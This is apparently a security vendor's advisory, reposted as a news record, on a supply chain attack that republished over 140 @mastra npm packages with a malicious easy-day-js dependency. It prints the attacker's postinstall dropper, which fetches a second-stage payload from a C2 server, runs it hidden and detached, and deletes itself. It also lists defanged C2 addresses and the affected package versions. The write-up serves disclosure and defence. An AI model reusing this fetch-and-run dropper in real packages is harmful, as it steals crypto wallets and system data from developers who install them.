{"slug": "over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "title": "Over 140 popular Mastra npm Packages Hit by Supply Chain Attack", "summary": "A supply chain attack compromised over 140 npm packages in the @mastra scope, including @mastra/core with 918K weekly downloads, by injecting a malicious dependency that executes a postinstall script to deploy crypto wallet-stealing malware. The attack mirrors the March 2026 axios compromise, using a clean decoy version followed by a malicious update that fetches a second-stage payload from a Hostwinds C2 server targeting over 160 browser-based crypto wallet extensions.", "body_md": "On June 17th we detected a large-scale supply chain attack targeting the entire `@mastra`\n\nnpm scope, a popular open-source AI agent framework. An attacker republished 141 packages in a burst between 01:15 and 02:00 UTC, silently injecting a malicious dependency into every one of them. The affected packages include `@mastra/core`\n\n, which has 918K weekly npm downloads, as well as `mastra`\n\nand `create-mastra`\n\n.\n\n## The postinstall script\n\nAll 141 packages had a single new dependency added to their `package.json`\n\n: `easy-day-js`\n\n, a malicious clone of the popular date library `dayjs`\n\n. The package was published by a separate attacker-controlled account a day before the scope takeover. Crucially, the initial release (1.11.21) was completely clean, a straight copy of `dayjs`\n\nwith no install hooks. The malicious version (1.11.22) followed the next day, right around the time the `@mastra`\n\npackages were republished. The compromised packages depend on `^1.11.21`\n\n, but npm's caret resolution automatically pulls in the malicious 1.11.22 as the latest version, while auditing the pinned version reveals nothing suspicious.\n\nVersion 1.11.22 adds a `postinstall`\n\nhook that runs `setup.cjs`\n\n, an obfuscated script that executes automatically at install time without any user interaction.\n\n``` js\n// obfuscated -- stripped down to the essential logic\nconst payload = await (await fetch('https://23[.]254[.]164[.]92:8000/update/49890878')).text();\nconst file = path.join(os.tmpdir(), crypto.randomBytes(12).toString('hex') + '.js');\nfs.writeFileSync(file, payload, 'utf8');\nchild_process.spawn(process.execPath, [file, '23[.]254[.]164[.]123:443'], {\n  detached: true, stdio: 'ignore', windowsHide: true\n}).unref();\nfs.rmSync(__filename, { force: true }); // self-deletes\n```\n\nWhat this script does, step by step:\n\n- Fetches a second-stage payload from the C2 server at\n`23[.]254[.]164[.]92:8000`\n\n- Writes the payload to a randomly named\n`.js`\n\nfile in the OS temp directory - Spawns the payload as a fully detached background process, invisible on all platforms (\n`stdio: ignore, windowsHide: true`\n\n), passing a second C2 host`23[.]254[.]164[.]123:443`\n\nas an argument - Self-deletes to remove forensic evidence of the postinstall hook\n\nThe second stage runs as a long-lived background process that collects system information and targets over 160 browser-based crypto wallet extensions, including MetaMask, Keplr, Coinbase, and more. It establishes persistence by disguising itself as node-related tools on macOS, Windows, and Linux, all phoning home to `23[.]254[.]164[.]123:443`\n\n.\n\n## Similarities with the axios compromise\n\nThe playbook here is nearly identical to the [axios compromise](https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat) we covered in March 2026. In both attacks, the attacker avoided touching the target package's own code and instead injected a malicious dependency, relying on npm's `postinstall`\n\nhook to execute the payload automatically at install time. Both staged a clean decoy version first, then followed with the malicious one. In the axios attack, `plain-crypto-js`\n\nplayed the role that `easy-day-js`\n\nplays here. Both droppers also self-delete after execution to remove forensic evidence.\n\nThe infrastructure also follows the same pattern. The axios dropper called back to a Hostwinds VPS on port 8000. The `easy-day-js`\n\ndropper does the same, hitting `23[.]254[.]164[.]92:8000`\n\non Hostwinds infrastructure.\n\n## How Aikido detects this\n\nIf you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.\n\nIf you are not yet an Aikido user, you can [create an account](https://app.aikido.dev/login) and connect your repos. Our malware coverage is included in the free plan, no credit card required.\n\nFor broader coverage across your whole team, Aikido's [Device Protection](https://www.aikido.dev/protect/device-protection) gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.\n\nFor future protection, consider [Aikido Safe Chain](https://github.com/AikidoSec/safe-chain) (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against [Aikido Intel](https://intel.aikido.dev/) before install.\n\n## Indicators of Compromise\n\n**Network indicators**\n\n`23[.]254[.]164[.]92:8000`\n\n— first-stage C2, payload download`23[.]254[.]164[.]123:443 `\n\n— second-stage callback host, passed to the spawned RAT\n\n**Affected packages**\n\neasy-day-js@1.11.22\n\ncreate-mastra@1.13.1\n\nmastra@1.13.1\n\n@mastra/acp@0.2.2\n\n@mastra/agent-browser@0.3.2\n\n@mastra/agent-builder@1.0.42\n\n@mastra/agentcore@0.2.2\n\n@mastra/agentfs@0.1.1\n\n@mastra/ai-sdk@1.4.6\n\n@mastra/arize@1.2.3\n\n@mastra/arthur@0.3.3\n\n@mastra/astra@1.0.2\n\n@mastra/auth@1.0.3\n\n@mastra/auth-auth0@1.0.2\n\n@mastra/auth-better-auth@1.0.4\n\n@mastra/auth-clerk@1.0.3\n\n@mastra/auth-cloud@1.1.4\n\n@mastra/auth-firebase@1.0.1\n\n@mastra/auth-okta@0.0.5\n\n@mastra/auth-studio@1.2.4\n\n@mastra/auth-supabase@1.0.2\n\n@mastra/auth-workos@1.5.3\n\n@mastra/azure@0.2.3\n\n@mastra/blaxel@0.4.2\n\n@mastra/braintrust@1.1.4\n\n@mastra/brightdata@0.2.2\n\n@mastra/browser-firecrawl@0.1.1\n\n@mastra/browser-viewer@0.1.3\n\n@mastra/chroma@1.0.2\n\n@mastra/claude@1.0.3\n\n@mastra/clickhouse@1.10.1\n\n@mastra/client-js@1.24.1\n\n@mastra/cloud@0.1.24\n\n@mastra/cloudflare@1.4.2\n\n@mastra/cloudflare-d1@1.0.7\n\n@mastra/codemod@1.0.4\n\n@mastra/convex@1.2.2\n\n@mastra/core@1.42.1\n\n@mastra/couchbase@1.0.4\n\n@mastra/cursor@0.2.1\n\n@mastra/dane@1.0.2\n\n@mastra/datadog@1.2.5\n\n@mastra/daytona@0.4.2\n\n@mastra/deployer@1.42.1\n\n@mastra/deployer-cloud@1.42.1\n\n@mastra/deployer-cloudflare@1.1.44\n\n@mastra/deployer-netlify@1.1.20\n\n@mastra/deployer-vercel@1.1.38\n\n@mastra/docker@0.3.1\n\n@mastra/dsql@1.0.3\n\n@mastra/duckdb@1.4.3\n\n@mastra/dynamodb@1.0.9\n\n@mastra/e2b@0.3.4\n\n@mastra/editor@0.11.3\n\n@mastra/elasticsearch@1.2.1\n\n@mastra/engine@0.1.1\n\n@mastra/evals@1.3.1\n\n@mastra/express@1.3.31\n\n@mastra/fastembed@1.1.3\n\n@mastra/fastify@1.3.31\n\n@mastra/files-sdk@0.2.1\n\n@mastra/gcs@0.2.3\n\n@mastra/github-signals@0.1.2\n\n@mastra/google-cloud-pubsub@1.0.6\n\n@mastra/google-drive@0.1.1\n\n@mastra/hono@1.4.26\n\n@mastra/inngest@1.5.2\n\n@mastra/koa@1.5.14\n\n@mastra/laminar@1.2.3\n\n@mastra/lance@1.0.7\n\n@mastra/langfuse@1.3.6\n\n@mastra/langsmith@1.2.4\n\n@mastra/libsql@1.13.1\n\n@mastra/loggers@1.1.3\n\n@mastra/longmemeval@1.0.50\n\n@mastra/mcp@1.10.1\n\n@mastra/mcp-docs-server@1.1.47\n\n@mastra/mcp-registry-registry@1.0.2\n\n@mastra/mem0@0.1.14\n\n@mastra/memory@1.20.4\n\n@mastra/modal@0.2.2\n\n@mastra/mongodb@1.9.3\n\n@mastra/mssql@1.3.2\n\n@mastra/mysql@0.1.1\n\n@mastra/nestjs@0.1.15\n\n@mastra/node-audio@0.1.8\n\n@mastra/node-speaker@0.1.1\n\n@mastra/observability@1.14.2\n\n@mastra/openai@1.0.2\n\n@mastra/opencode@0.0.47\n\n@mastra/opensearch@1.0.3\n\n@mastra/otel-bridge@1.2.3\n\n@mastra/otel-exporter@1.2.3\n\n@mastra/perplexity@0.1.1\n\n@mastra/pg@1.13.1\n\n@mastra/pinecone@1.0.2\n\n@mastra/playground-ui@33.0.1\n\n@mastra/posthog@1.0.29\n\n@mastra/qdrant@1.0.3\n\n@mastra/rag@2.2.2\n\n@mastra/railway@0.1.1\n\n@mastra/react@1.0.1\n\n@mastra/redis@1.1.3\n\n@mastra/redis-streams@0.0.4\n\n@mastra/s3@0.5.3\n\n@mastra/s3vectors@1.0.7\n\n@mastra/schema-compat@1.2.12\n\n@mastra/sentry@1.1.4\n\n@mastra/server@2.1.1\n\n@mastra/slack@1.3.1\n\n@mastra/spanner@1.1.2\n\n@mastra/speech-azure@0.2.1\n\n@mastra/speech-elevenlabs@0.2.1\n\n@mastra/speech-google@0.2.1\n\n@mastra/speech-ibm@0.2.1\n\n@mastra/speech-murf@0.2.1\n\n@mastra/speech-openai@0.2.1\n\n@mastra/speech-replicate@0.2.1\n\n@mastra/speech-speechify@0.2.1\n\n@mastra/stagehand@0.2.5\n\n@mastra/tavily@1.0.3\n\n@mastra/temporal@0.1.14\n\n@mastra/turbopuffer@1.0.3\n\n@mastra/twilio@1.0.2\n\n@mastra/upstash@1.1.3\n\n@mastra/vectorize@1.0.3\n\n@mastra/vercel@1.0.1\n\n@mastra/voice-aws-nova-sonic@0.1.4\n\n@mastra/voice-azure@0.11.2\n\n@mastra/voice-cloudflare@0.12.3\n\n@mastra/voice-deepgram@0.12.2\n\n@mastra/voice-elevenlabs@0.12.2\n\n@mastra/voice-gladia@0.12.2\n\n@mastra/voice-google@0.12.3\n\n@mastra/voice-google-gemini-live@0.12.2\n\n@mastra/voice-inworld@0.3.1\n\n@mastra/voice-modelslab@0.1.2\n\n@mastra/voice-murf@0.12.3\n\n@mastra/voice-openai@0.12.3\n\n@mastra/voice-openai-realtime@0.12.6\n\n@mastra/voice-playai@0.12.2\n\n@mastra/voice-sarvam@1.0.2\n\n@mastra/voice-speechify@0.12.2\n\n@mastra/voice-xai-realtime@0.1.2", "url": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "canonical_source": "https://www.aikido.dev/blog/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "published_at": "2026-06-17 08:43:00+00:00", "updated_at": "2026-06-17 10:00:13.375601+00:00", "lang": "en", "topics": ["ai-safety", "ai-tools", "ai-agents"], "entities": ["Mastra", "npm", "Aikido", "MetaMask", "Keplr", "Coinbase", "Hostwinds", "axios"], "alternates": {"html": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack", "markdown": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.md", "text": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.txt", "jsonld": "https://wpnews.pro/news/over-140-popular-mastra-npm-packages-hit-by-supply-chain-attack.jsonld"}}